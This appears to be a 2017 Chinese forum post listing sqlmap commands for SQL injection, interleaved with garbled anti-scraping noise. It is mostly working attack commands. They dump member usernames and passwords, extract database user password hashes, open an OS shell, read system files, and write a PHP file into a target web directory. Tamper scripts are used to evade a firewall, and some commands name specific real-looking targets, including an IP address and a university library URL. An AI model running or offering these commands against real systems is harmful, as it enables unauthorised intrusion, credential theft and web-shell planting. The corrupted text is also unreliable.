找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2451|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
# U' [8 {' ]) i( A+ ?% h, N: x! o* k. U/ e6 ]7 b6 N
update :::::>     in the folder   after  execute    following   order : svn update8 |1 g; D+ l8 e7 q1 i

& k, x0 r  s0 Z- \sqlmap.py -r 1.txt --current-db
$ |& o/ `+ Z) K% @- P2 l3 [2 q7 G% ^9 A2 X2 B
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
& y& h* i4 w- C2 i& f( }, g, H8 r0 |9 L: @( k( |4 B
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
; x5 V/ m) H( R0 H+ y+ d+ C. g: l猜解数据库& a" D# h6 Z. f) ^2 i7 i$ T* k
./sqlmap.py -u "injection-url" --dbs
0 H) v5 W+ E2 G* A% W2 Fsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"' V& z8 q% Y' \) E* U

7 ^  l$ l( I2 C% k/ e) _! W猜解表名
" z' S% A/ T$ t8 V) o- s$ I./sqlmap.py -u "injection-url" -D database_name --tables
' M; O: N* L( ^) l) P# p1 N
% J2 U4 M$ F6 l; N/ Psqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
. y! }' r; N( d% U; fsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" . p' p5 L- G% v8 z* ]5 \6 ?( _
+ r4 R( r' F, c8 |6 _
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
) q- Y+ ^, F& Z; |5 d3 F$ r
8 D* D; u/ m1 U+ h( Ysqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py". k9 T2 e( }% B) `$ l' n' H4 q
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
3 a3 ?. x% W; O9 @% j8 ysqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
7 `9 e) U* E3 m/ L/ isqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"4 z! M4 }1 o) s$ M
3 P% Q# v  f6 b5 b5 c+ T9 ^
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
+ N7 {) h+ a/ h" i1 d3 nsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"+ b& V/ }/ \8 z) F$ u" F
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"4 b9 v5 E6 p- C( H
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py", z3 j7 F% ?5 i  l
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
* @: d  y7 d! @5 O" {0 F: c
: c9 a/ ~! R' N5 ~  j' ysqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了: U& L! U' H* J3 V4 @
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"0 q" @3 R. v. b6 J& {# S# e6 x- H$ F* }1 G
( I8 v( j+ b) x- f. u7 ]/ {% h5 \
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
, R+ E) B2 P$ T* P1 A. i3 }猜解列名# B& X, g0 `0 }4 J% t* _. }8 \
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
( n, d3 W2 |, T  y% A" h2 h' d
6 e; s! v: R% W, @sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" / J/ d  y0 e" e2 p! a* C7 s
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" $ ~$ Z& Y. E& g( O: @
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
2 I8 X" x/ h, Y7 A- c9 ~' l
4 ^: O( m9 d: L4 `6 c! wsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"7 s2 ^5 x) K* L! u, n
&submit=Go( |+ j! F$ g% M8 D
猜解值
2 g( }3 c6 R7 C8 b$ D: _6 x  o. j  c4 f./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump" x( L6 D  k- d9 }: t- p
========================================================
, B- \6 z- W8 \# `. G2 z$ D搜索表名中包括mana字符的
8 B) n) \' U/ H; B% f0 l/ R# X/sqlmap.py -u "injection-url" -T mana --search
3 v. r/ C/ ]3 m+ L# i7 v! h2 F) m返回一个交互式sql shell: f( l, G  Y: P6 i$ X: b& Y# n
/sqlmap.py -u "injection-url" --sql-shell
& g$ z, E: D$ h& N: l% H读取指定文件(需权限)
! B( A  c5 v) w* T- M" m. [8 P/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"0 d% L2 v8 y' n
查看当前 用户 及 数据库
4 S: _' u& S: J/sqlmap.py -u "injection-url" --current-user --current-db9 M  p, Q4 P# ^/ \
本地文件 写入 远程目标绝对路径# P8 @5 a3 T9 {4 i
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径- L6 ~  \2 t, w* W% s5 }8 z
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"   y. G2 I9 J5 j8 {! y8 T- R$ u

  O0 w3 {% d0 b7 Q0 C+ J% _sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径; B/ q# V2 B1 H; g! F- B: N
查看某用的权限
* U. e6 p# i+ a4 j/sqlmap.py -u "injection-url" --privileges -U root
% Z2 v, H0 }9 @) i查看当前用户是否为dba
, l$ W) X& p/ l/sqlmap.py -u "injection-url" --is-dba# Y5 L" [, C1 |& A! \9 r
读取所有数据库用户或指定数据库用户的密码
2 [6 {/ K, S. g7 ^) h" T1 Ysqlmap.py -r 1.txt --users --passwords6 i& d4 V- D' M- W' j8 `
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" ; k/ s% a( x- J( j6 c9 w* x
* R) H3 i. u, A
/sqlmap.py -u "injection-url" --passwords -U root
8 B' p1 p* |8 o9 @6 _: Z. `
3 ?' F" m# @* s8 v) A--start&&--stop 与 --first&&--last 的区别6 ~" y/ B  E# i- p" l; n- z
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)+ |; [: L' B% t' j  s

+ H  i7 s5 }. M3 W# k9 Q从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)4 R- v/ l, X5 V4 d5 T
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables- |% b3 M# x* A" b
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns8 b- {* E( u( c. r1 H2 J

0 o1 ~# O( _; C9 h执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
" {; A+ T& Z9 V; g/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"+ h+ z* U, w. ?1 Q9 N

/ O  _/ O) ~, g  ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表